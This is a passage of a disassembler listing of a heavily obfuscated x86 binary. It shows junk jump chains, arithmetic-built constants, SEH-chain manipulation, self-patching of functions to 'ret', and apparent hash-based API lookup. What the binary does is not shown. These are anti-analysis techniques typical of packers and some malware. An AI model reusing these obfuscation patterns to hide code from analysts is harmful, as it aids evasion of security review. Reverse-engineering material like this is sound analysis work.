; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444BE1

loc_4451B1:				; CODE XREF: sub_444BE1:loc_4397DDj
		jz	loc_441907

loc_4451B7:				; CODE XREF: sub_4466CE-4A46j
		jmp	loc_44B756
; END OF FUNCTION CHUNK	FOR sub_444BE1
; ---------------------------------------------------------------------------
		add	edi, ebx
		jz	loc_4530CA
		jmp	loc_441902
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C0DE

loc_4451C9:				; CODE XREF: sub_43C0DE:loc_4598D9j
		add	eax, edi
		call	sub_45B586

loc_4451D0:				; CODE XREF: hvvrg7ie:0045AC02j
		jmp	loc_44E8B0
; END OF FUNCTION CHUNK	FOR sub_43C0DE
; ---------------------------------------------------------------------------

loc_4451D5:				; CODE XREF: hvvrg7ie:00441531j
		jmp	loc_43B09E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B863

loc_4451DA:				; CODE XREF: sub_45B863-2244Cj
		xor	eax, eax
		retn
; END OF FUNCTION CHUNK	FOR sub_45B863
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458591

loc_4451DD:				; CODE XREF: sub_458591-2440j
		jmp	loc_446BF5
; END OF FUNCTION CHUNK	FOR sub_458591
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D531

loc_4451E2:				; CODE XREF: hvvrg7ie:00450755j
					; hvvrg7ie:0045075Fj ...
		pop	large dword ptr	fs:0
		add	esp, 4
		retn
; END OF FUNCTION CHUNK	FOR sub_43D531
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449885

loc_4451ED:				; CODE XREF: sub_449885+6665j
		jmp	loc_443DCA
; END OF FUNCTION CHUNK	FOR sub_449885
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439B29

loc_4451F2:				; CODE XREF: sub_439B29+6B03j
		jmp	loc_45005C
; END OF FUNCTION CHUNK	FOR sub_439B29

; =============== S U B	R O U T	I N E =======================================



sub_4451F7	proc near		; CODE XREF: sub_44A91Ap
		push	large dword ptr	fs:0
		mov	large fs:0, esp
		jmp	loc_452FD0
sub_4451F7	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456A52

loc_44520A:				; CODE XREF: sub_43E82E+Cj
					; sub_4462F9-165j ...
		push	offset loc_4585DC
		jmp	nullsub_265
; END OF FUNCTION CHUNK	FOR sub_456A52
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CB64

loc_445214:				; CODE XREF: sub_44CB64+369Aj
		push	edi
		sbb	ebp, 0B6590E3Ah
		jmp	loc_446399
; END OF FUNCTION CHUNK	FOR sub_44CB64
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E560

loc_445220:				; CODE XREF: sub_44E560:loc_444D70j
		or	ecx, ecx
; END OF FUNCTION CHUNK	FOR sub_44E560
; START	OF FUNCTION CHUNK FOR sub_439873

loc_445222:				; CODE XREF: sub_439873+Aj
		jz	loc_43C3D7
		mov	ebx, [ebx+ecx]
		call	sub_44BB51

loc_445230:				; CODE XREF: sub_450434:loc_455771j
		mov	[edi], eax
		pop	edi
		pop	ecx
		xor	eax, eax
		retn
; END OF FUNCTION CHUNK	FOR sub_439873
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439FEE

loc_445237:				; CODE XREF: sub_439FEE+801j
					; hvvrg7ie:00440C44j
		jmp	loc_44DBE7
; END OF FUNCTION CHUNK	FOR sub_439FEE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441C2A

loc_44523C:				; CODE XREF: sub_441C2A:loc_44CBE9j
		popf
		call	sub_458992

loc_445242:				; CODE XREF: sub_455AA0+Cj
		jmp	nullsub_295
; END OF FUNCTION CHUNK	FOR sub_441C2A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449387

loc_445247:				; CODE XREF: sub_449387+8j
		jmp	loc_445A8D
; END OF FUNCTION CHUNK	FOR sub_449387

; =============== S U B	R O U T	I N E =======================================



sub_44524C	proc near		; CODE XREF: hvvrg7ie:0043D45Cj
					; sub_44DBA5+Dp

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00440BC9 SIZE 00000004 BYTES
; FUNCTION CHUNK AT 0045477F SIZE 00000005 BYTES

		xchg	eax, [esp-4+arg_0]
		pop	eax
		mov	[esi], eax
		xchg	ecx, [esp+0]
		jmp	loc_45477F
sub_44524C	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444593

loc_44525A:				; CODE XREF: sub_444593:loc_439F46j
		or	ebx, 93777A92h
		xor	ebx, 0D33D8A33h
		add	ebx, 0B7793F6Ah
		xchg	ebx, [esp+4+var_4]
		jmp	loc_459EC4
; END OF FUNCTION CHUNK	FOR sub_444593
; ---------------------------------------------------------------------------
		mov	esi, eax
		jmp	sub_446EC2
; ---------------------------------------------------------------------------

loc_44527B:				; CODE XREF: hvvrg7ie:00442D0Dj
		test	edi, 81D87F5Ch
		jmp	loc_453E7A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44004A

loc_445286:				; CODE XREF: sub_44004A-25F8j
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_44004A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450BDE

loc_445288:				; CODE XREF: sub_450BDE+13j
		jmp	loc_45197E
; END OF FUNCTION CHUNK	FOR sub_450BDE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FD2B

loc_44528D:				; CODE XREF: sub_43FD2B+11j
		jmp	loc_45656D
; END OF FUNCTION CHUNK	FOR sub_43FD2B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BFF5

loc_445292:				; CODE XREF: sub_44BFF5-C5C9j
		jmp	loc_44AE2C
; END OF FUNCTION CHUNK	FOR sub_44BFF5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44388C

loc_445297:				; CODE XREF: sub_44388C-7855j
		jmp	loc_449F6A
; END OF FUNCTION CHUNK	FOR sub_44388C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453422

loc_44529C:				; CODE XREF: sub_453422-1791Ej
		mov	eax, [ebp-4]
		push	edx
		push	8BA1C772h
		pop	edx
		add	edx, 25377F56h
		and	edx, 0F74B29F0h
		jmp	loc_447E5C
; END OF FUNCTION CHUNK	FOR sub_453422
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E3B3

loc_4452B7:				; CODE XREF: sub_44E3B3-D475j
					; hvvrg7ie:loc_455E70j
		and	ebp, eax
		mov	esi, [edi]
		rol	esi, 7
; END OF FUNCTION CHUNK	FOR sub_44E3B3
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_4452BE:				; CODE XREF: sub_44E3B3:loc_4448B8j
					; sub_44D2F8+8j ...
		jz	loc_4413D2
		cmp	dword ptr [ebp-4], 2
		jmp	loc_442797
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_289. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D285

loc_4452CE:				; CODE XREF: sub_43D285+13903j
		push	4134EEA8h
		pop	ecx
		rol	ecx, 0Ch
		add	ecx, 381D4DF7h
		or	ecx, 27B6724Eh
		add	ecx, 58480DB2h
		xchg	ecx, [esp+18h+var_18]
		push	edi
		jmp	loc_443292
; END OF FUNCTION CHUNK	FOR sub_43D285

; =============== S U B	R O U T	I N E =======================================



sub_4452F2	proc near		; DATA XREF: hvvrg7ie:0044422Fo

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043AABE SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044C444 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00458240 SIZE 00000015 BYTES

		imul	byte ptr [edx]
		call	sub_443086

loc_4452F9:				; CODE XREF: hvvrg7ie:0045095Ej
		jmp	loc_458240
sub_4452F2	endp

; ---------------------------------------------------------------------------

loc_4452FE:				; CODE XREF: hvvrg7ie:loc_44DC30j
		jnz	loc_43DF14
		jmp	loc_44792A
; ---------------------------------------------------------------------------

loc_445309:				; CODE XREF: hvvrg7ie:00444D80j
		jns	loc_453201
		jl	loc_43AB15
		jmp	loc_45A86F

; =============== S U B	R O U T	I N E =======================================



sub_44531A	proc near		; CODE XREF: hvvrg7ie:004459E9j
					; sub_442FD1:loc_45B28Ap

; FUNCTION CHUNK AT 00447879 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044793F SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044B695 SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		add	edi, 0F2DDFF2Eh
		add	eax, edi
		jmp	loc_44B695
sub_44531A	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44532B:				; CODE XREF: hvvrg7ie:loc_442775j
		mov	eax, 26F528F2h
		call	sub_450C5A
		push	ecx
		push	3353727h
		pop	ecx
		rol	ecx, 0Ah
		jmp	loc_4591F9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4465A6

loc_445344:				; CODE XREF: sub_4465A6:loc_445FCFj
		jl	loc_44D575
; END OF FUNCTION CHUNK	FOR sub_4465A6
; START	OF FUNCTION CHUNK FOR sub_43DC31

loc_44534A:				; CODE XREF: sub_43DC31+Ej
		jmp	loc_44A63C
; END OF FUNCTION CHUNK	FOR sub_43DC31
; ---------------------------------------------------------------------------
		jb	loc_458C5B
		cmp	esi, 0C49C1300h
		jmp	loc_44D56F
; ---------------------------------------------------------------------------
		xchg	ebp, esi
		pop	esi
		jmp	sub_44350E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449425

loc_445368:				; CODE XREF: sub_449425+99A3j
		add	esi, 80B151F3h
		and	esi, 103FF334h
		rol	esi, 1Ch
		sub	esi, ds:4000F0h
		xor	esi, 413A8CE8h
		xor	eax, esi
		jmp	loc_44AFAE
; END OF FUNCTION CHUNK	FOR sub_449425
; ---------------------------------------------------------------------------

loc_44538A:				; CODE XREF: hvvrg7ie:00454664j
		jnp	loc_44E62C
		jge	loc_452AFB
		sub	ebx, edx
		jbe	loc_4408D3
		rol	ecx, 1Fh
; START	OF FUNCTION CHUNK FOR sub_43D964

loc_4453A1:				; CODE XREF: sub_43D964:loc_454653j
		rol	edi, 1Bh
		test	edi, 800000h
		jmp	loc_459EE4
; END OF FUNCTION CHUNK	FOR sub_43D964
; ---------------------------------------------------------------------------

loc_4453AF:				; CODE XREF: hvvrg7ie:loc_44C0D4j
		jz	loc_4507DF
		jmp	loc_45955C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443048

loc_4453BA:				; CODE XREF: sub_443048+Cj
		push	3F4490Ch
		pop	ecx
		add	ecx, 60BAD671h
		sub	ecx, 6A23EC1Bh
		jb	loc_447ECC

loc_4453D2:				; CODE XREF: sub_44F9CA+5j
		mov	[ebp-20h], eax
; END OF FUNCTION CHUNK	FOR sub_443048
; START	OF FUNCTION CHUNK FOR sub_43DD2C

loc_4453D5:				; CODE XREF: sub_43DD2C+4j
					; sub_43DD2C+EA7j ...
		mov	eax, [ebp-20h]
		sub	eax, [ebp-28h]
		mov	[ebp-24h], eax
		mov	eax, [ebp-24h]
		jmp	loc_44D466
; END OF FUNCTION CHUNK	FOR sub_43DD2C
; ---------------------------------------------------------------------------

loc_4453E6:				; CODE XREF: hvvrg7ie:004522C9j
		add	esi, 0EB4EB97h

; =============== S U B	R O U T	I N E =======================================



sub_4453EC	proc near		; CODE XREF: sub_450AA8:loc_44AF67p

; FUNCTION CHUNK AT 0043BCBE SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0043DF9E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A13E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044EACF SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044EC3D SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00452D06 SIZE 00000016 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		mov	eax, 120h
		call	sub_457C82
		jmp	loc_43DF9E
sub_4453EC	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_327. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443E56

loc_445400:				; CODE XREF: sub_443E56-4BFEj
		jmp	sub_443E56
; END OF FUNCTION CHUNK	FOR sub_443E56
; ---------------------------------------------------------------------------

loc_445405:				; CODE XREF: hvvrg7ie:004520B7j
		ror	esi, 12h

; =============== S U B	R O U T	I N E =======================================



sub_445408	proc near		; CODE XREF: sub_445BA0+1p

; FUNCTION CHUNK AT 0044D26A SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		lea	eax, nullsub_346
		mov	byte ptr [eax],	0C3h
		jmp	loc_44D26A
sub_445408	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44541A:				; CODE XREF: hvvrg7ie:loc_43B60Fj
		mov	eax, [esp]
		push	edx
		push	ebx
		jmp	loc_439C6C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456A52

loc_445424:				; CODE XREF: sub_456A52+4j
		mov	esp, ebp
		pop	ebp
		mov	eax, ds:dword_448D00
		or	eax, eax
		jnz	loc_457392
		jmp	loc_43D166
; END OF FUNCTION CHUNK	FOR sub_456A52

; =============== S U B	R O U T	I N E =======================================



sub_44543A	proc near		; DATA XREF: sub_439549:loc_4590FCo

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 0043A7C7 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0043C3B4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440B44 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044178E SIZE 00000023 BYTES
; FUNCTION CHUNK AT 004427C4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004430EF SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004461F7 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00446388 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004473D0 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 00448B13 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044A081 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044A860 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455216 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0045601F SIZE 00000021 BYTES
; FUNCTION CHUNK AT 00458132 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004581E7 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00458A0E SIZE 00000005 BYTES

		push	0
		push	edi
		push	609A30ABh
		pop	edi
		jmp	loc_446388
sub_44543A	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_445448:				; CODE XREF: hvvrg7ie:0043FD8Bj
		add	eax, 33C4CCC1h
		or	eax, eax
		jz	loc_4463DD
		jmp	loc_43A6CB
; ---------------------------------------------------------------------------

loc_44545B:				; CODE XREF: hvvrg7ie:0044FDA7j
		xchg	esi, [esp]
		mov	edx, esi
		xchg	ebp, [esp]
		mov	esi, ebp
		pop	ebp
		jmp	loc_4469A4
; ---------------------------------------------------------------------------

loc_44546B:				; DATA XREF: sub_447162:loc_45A5FDo
		push	2D3EC362h
		pop	edx
		xor	edx, 7294EFC7h
		sub	edx, 6C7F817Eh
		test	edx, 20000000h
		jmp	loc_43D584

; =============== S U B	R O U T	I N E =======================================



sub_445488	proc near		; CODE XREF: sub_450C5A:loc_442381j

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043B891 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445CFF SIZE 0000000E BYTES

		push	ebp
		mov	ebp, edx
		xchg	ebp, [esp+4+var_4]

loc_44548E:				; CODE XREF: sub_45889B:loc_43FE73j
		push	2318D2Ah
		pop	edx
		or	edx, 862372C0h
		sub	edx, 8694064Dh
		and	edx, 91974EECh
		jmp	loc_43B891
sub_445488	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447E20

loc_4454AB:				; CODE XREF: sub_447E20+12A35j
		jz	loc_454770

loc_4454B1:				; CODE XREF: sub_45B048-1955Bj
		jmp	loc_459E49
; END OF FUNCTION CHUNK	FOR sub_447E20
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446B99

loc_4454B6:				; CODE XREF: sub_446B99:loc_441C0Aj
					; sub_458746-13217j
		jl	loc_44D356
		push	8405BD97h
		jmp	loc_44D351
; END OF FUNCTION CHUNK	FOR sub_446B99

; =============== S U B	R O U T	I N E =======================================



sub_4454C6	proc near		; DATA XREF: sub_444D8E+15o
		jnz	loc_444D95
		retn
sub_4454C6	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444D8E

loc_4454CD:				; CODE XREF: sub_444D8E:loc_444D95j
		cmp	dword ptr [eax], 0FFFFFFFFh
		mov	ebx, [eax+4]
		mov	eax, [eax]
		jnz	loc_444D95
		retn
; END OF FUNCTION CHUNK	FOR sub_444D8E
; ---------------------------------------------------------------------------

loc_4454DC:				; CODE XREF: hvvrg7ie:0044D191j
		jmp	sub_443E56

; =============== S U B	R O U T	I N E =======================================



sub_4454E1	proc near		; CODE XREF: sub_4572D1:loc_444996p

; FUNCTION CHUNK AT 004467C9 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 004592E2 SIZE 00000005 BYTES

		push	ebx
		jmp	loc_4467C9
sub_4454E1	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C0DE

loc_4454E7:				; CODE XREF: sub_43C0DE-15ABj
		mov	edx, [ebp+8]

loc_4454EA:				; CODE XREF: hvvrg7ie:loc_448E3Dj
		or	[edx-8], eax
		jmp	loc_44108A
; END OF FUNCTION CHUNK	FOR sub_43C0DE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446D8D

loc_4454F2:				; CODE XREF: sub_450D8D-171FEj
					; sub_446D8D:loc_44E745j
		cmp	dword ptr [ebp-10h], 1
		jnz	loc_4450CE
		mov	eax, [ebp+8]
		mov	eax, [eax-8]
		jmp	loc_44B661
; END OF FUNCTION CHUNK	FOR sub_446D8D
; ---------------------------------------------------------------------------
		jge	loc_44A3CD
		test	ebp, edx
		jmp	loc_44CD93
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458746

loc_445514:				; CODE XREF: sub_458746-1DB67j
		push	0
		push	edx
		push	0F15C319Eh
		pop	edx
		xor	edx, 45976124h
		add	edx, 3722CD21h
		cmp	edx, 3DCA5Ch
		jmp	loc_4454B6
; END OF FUNCTION CHUNK	FOR sub_458746
; ---------------------------------------------------------------------------
		jz	loc_44280E
		jmp	sub_455E0D
; ---------------------------------------------------------------------------

loc_44553F:				; CODE XREF: hvvrg7ie:loc_4489A9j
		mov	ds:off_41D05C, eax
		lea	eax, sub_44EC16
		mov	byte ptr [eax],	0C3h
		jmp	loc_452D01
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44EC16

loc_445553:				; CODE XREF: sub_44EC16+1j
		mov	eax, [esp+0]
		push	ebp
		shr	ebp, 5
		jmp	loc_45166F
; END OF FUNCTION CHUNK	FOR sub_44EC16
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_210. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445934

loc_445560:				; CODE XREF: sub_445934+11E3Bj
		jmp	loc_43B5CB
; END OF FUNCTION CHUNK	FOR sub_445934
; ---------------------------------------------------------------------------

loc_445565:				; CODE XREF: hvvrg7ie:004412EEj
		jmp	sub_446A16
; ---------------------------------------------------------------------------

loc_44556A:				; DATA XREF: hvvrg7ie:0045635Do
		add	edx, 0D851151Eh
		xchg	edx, [esp]
		jmp	loc_44E70D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A7E8

loc_445578:				; CODE XREF: sub_45A7E8:loc_441820j
		xor	eax, 0B58E7C09h
		push	edx
		pushf
		push	8333ED55h
		pop	edx
		sub	edx, 0B5082280h
		jmp	loc_446D1D
; END OF FUNCTION CHUNK	FOR sub_45A7E8

; =============== S U B	R O U T	I N E =======================================



sub_445591	proc near		; CODE XREF: sub_44AA5B:loc_44AA61p
					; hvvrg7ie:00457445j

; FUNCTION CHUNK AT 00446997 SIZE 0000000D BYTES

		xchg	edx, [esp+0]
		pop	edx
		push	esi
		mov	esi, ebp
		xchg	esi, [esp+0]
		jmp	loc_446997
sub_445591	endp

; ---------------------------------------------------------------------------
		mov	esp, ebp
		pop	ebp
		push	ds:dword_44EE2C
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FD2B

loc_4455AA:				; CODE XREF: sub_43FD2B:loc_451E17j
		call	sub_444B29
; END OF FUNCTION CHUNK	FOR sub_43FD2B
; START	OF FUNCTION CHUNK FOR sub_449425

loc_4455AF:				; CODE XREF: sub_449425-CC71j
		jmp	loc_4432AE
; END OF FUNCTION CHUNK	FOR sub_449425
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4410E1

loc_4455B4:				; CODE XREF: sub_4410E1:loc_4467E7j
		pop	ecx
		rol	ecx, 1
		add	ecx, 0E81ACD23h
		mov	[ecx], eax
		jmp	loc_45861C
; END OF FUNCTION CHUNK	FOR sub_4410E1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F97

loc_4455C4:				; CODE XREF: sub_450F97:loc_444972j
		sub	ebx, 56622B9Eh
		add	ebx, 876D2808h
		mov	[ebx], eax
		pop	ebx
		jmp	loc_457C78
; END OF FUNCTION CHUNK	FOR sub_450F97
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4591C3

loc_4455D8:				; CODE XREF: sub_4591C3:loc_44FECEj
		jz	loc_458F8E
; END OF FUNCTION CHUNK	FOR sub_4591C3
; START	OF FUNCTION CHUNK FOR sub_456FF3

loc_4455DE:				; CODE XREF: sub_456FF3-4710j
		jmp	nullsub_376
; END OF FUNCTION CHUNK	FOR sub_456FF3
; ---------------------------------------------------------------------------
		cdq
		adc	ebp, edi
		pushf
		jmp	loc_458F8E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4544AA

loc_4455EC:				; CODE XREF: sub_4544AA+18j
		pop	ecx
		mov	eax, [eax]
		pushf
		push	3C96C511h
		pop	edx
		sub	edx, 765EED20h
		and	edx, 22EE3D1Dh
		jmp	loc_4392A2
; END OF FUNCTION CHUNK	FOR sub_4544AA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44059F

loc_445607:				; CODE XREF: sub_44059F:loc_44ACECj
		sbb	esi, ebp
		xor	ecx, edi
		jmp	loc_45AE7C
; END OF FUNCTION CHUNK	FOR sub_44059F
; ---------------------------------------------------------------------------

loc_445610:				; DATA XREF: sub_4408AE+EE06o
		mov	ds:dword_44EE2C, eax
		retn

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_445616	proc near		; CODE XREF: hvvrg7ie:loc_447DF3j
					; sub_446581:loc_448311p ...

; FUNCTION CHUNK AT 00443282 SIZE 00000005 BYTES

		push	ebp

loc_445617:				; CODE XREF: hvvrg7ie:00453084j
		mov	ebp, esp
		jns	sub_44CF7D
		jmp	loc_443282
sub_445616	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A7E8

loc_445624:				; CODE XREF: sub_45A7E8-1001Ej
		jge	loc_44D8CC

loc_44562A:				; CODE XREF: hvvrg7ie:loc_43CE93j
		push	eax

loc_44562B:				; CODE XREF: sub_4440CB:loc_447172j
		lea	eax, dword_43CE14
		push	eax
		push	edi
		jmp	loc_4394F1
; END OF FUNCTION CHUNK	FOR sub_45A7E8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E60A

loc_445638:				; CODE XREF: sub_43E60A-30A0j
		jz	loc_459101
		or	ebp, ebx
		jmp	loc_450C47
; END OF FUNCTION CHUNK	FOR sub_43E60A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AB9D

loc_445645:				; CODE XREF: sub_45AB9D-9801j
		sub	al, 99h
		push	59015E3Fh
		pop	edx
		or	edx, 7F745382h
		jmp	loc_452B38
; END OF FUNCTION CHUNK	FOR sub_45AB9D
; ---------------------------------------------------------------------------

loc_445658:				; CODE XREF: hvvrg7ie:00439B7Bj
		mov	ecx, eax

loc_44565A:				; CODE XREF: hvvrg7ie:loc_442862j
		call	sub_44E417
		push	esi
		mov	esi, ecx
		xchg	esi, [esp]
		jmp	loc_44DFF0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44934B

loc_44566A:				; CODE XREF: sub_44934B:loc_44B8C9j
		push	14AC2917h
		pop	ebx
		and	ebx, 0AF91E3C8h
		sub	ebx, 0C35D9FAh
		add	ebx, 7FA0F84h
		xchg	ebx, [esp+4+var_4]
		jmp	loc_45B495
; END OF FUNCTION CHUNK	FOR sub_44934B
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4466CE

loc_44568B:				; CODE XREF: sub_4466CE+Aj
		jmp	loc_4551E8
; END OF FUNCTION CHUNK	FOR sub_4466CE
; ---------------------------------------------------------------------------

loc_445690:				; CODE XREF: hvvrg7ie:0043C737j
		jnz	loc_456236
		or	ebx, 4C721CBEh
		jge	loc_45700D
		add	ebp, edx
		jmp	loc_456231
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D285

loc_4456A9:				; CODE XREF: sub_43D285-3F7Aj
		add	edi, 3B6BBA3Bh
		xor	edi, 2B59B168h
		popf
		xchg	edi, [esp+0]
		mov	eax, [ebp+var_8]
		jmp	loc_450D10
; END OF FUNCTION CHUNK	FOR sub_43D285
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_522. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A234

loc_4456C2:				; CODE XREF: sub_45A234:loc_439E33j
		cmp	dword ptr [ebp-0Ch], 0
		jz	loc_4445F9
		jmp	loc_43CDFF
; END OF FUNCTION CHUNK	FOR sub_45A234
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445F2A

loc_4456D1:				; CODE XREF: sub_445F2A+10774j
		jz	loc_44D509
		jmp	loc_44769F
; END OF FUNCTION CHUNK	FOR sub_445F2A
; ---------------------------------------------------------------------------

loc_4456DC:				; DATA XREF: sub_446297+8196o
		mov	eax, [eax]
		pushf
		push	edx
		push	3C5CE538h
		jmp	loc_446145
; ---------------------------------------------------------------------------

loc_4456EA:				; DATA XREF: sub_44F7CF+6Ao
		add	eax, ebp
		add	eax, 459DC269h
		mov	eax, [eax]
		mov	al, [eax]
		js	loc_4493DA
		sub	al, 99h
		jmp	loc_44C877
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4405D7

loc_445703:				; CODE XREF: sub_4405D7+10j
		jnz	loc_4431BC
		jmp	loc_44D2E6
; END OF FUNCTION CHUNK	FOR sub_4405D7
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_438. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444F21

loc_44570F:				; CODE XREF: sub_444F21+10j
		jmp	loc_443059
; END OF FUNCTION CHUNK	FOR sub_444F21
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450E01

loc_445714:				; CODE XREF: sub_450E01-E7C6j
		jmp	loc_448E92
; END OF FUNCTION CHUNK	FOR sub_450E01
; ---------------------------------------------------------------------------

loc_445719:				; CODE XREF: hvvrg7ie:00440B0Ej
		jmp	nullsub_493
; ---------------------------------------------------------------------------

loc_44571E:				; CODE XREF: hvvrg7ie:004494FBj
		push	edx
		call	sub_45AB9D
		mov	eax, 9DD7AB44h
		call	sub_450C5A
		mov	ds:dword_41D0EC, eax
		lea	eax, nullsub_500
		jmp	loc_455776
; ---------------------------------------------------------------------------

loc_44573F:				; CODE XREF: hvvrg7ie:0045A02Bj
		xchg	edi, [esp]
		call	sub_45AB9D
		mov	eax, 0D1CB0F56h
		call	sub_450C5A
		push	edi
		push	0DE1FA65Fh
		pop	edi
		jmp	loc_453B49
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456F9F

loc_44575D:				; CODE XREF: sub_456F9F:loc_43C6F4j
		mov	byte ptr [eax],	0C3h
		jmp	loc_43C329
; ---------------------------------------------------------------------------

loc_445765:				; CODE XREF: sub_456F9F:loc_44E39Cj
		xchg	edi, [esp+0]
		mov	edx, edi
		pop	edi
		mov	eax, [esp-4+arg_0]
		jmp	loc_458775
; END OF FUNCTION CHUNK	FOR sub_456F9F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448663

loc_445773:				; CODE XREF: sub_448663:loc_4504BCj
		pop	eax
		or	eax, 8B7E606Eh
		and	eax, 0A0960719h
		sub	eax, 0D88BF504h
		add	eax, 583A7A63h
		mov	eax, [eax]
		or	eax, eax
		jnz	loc_43B556
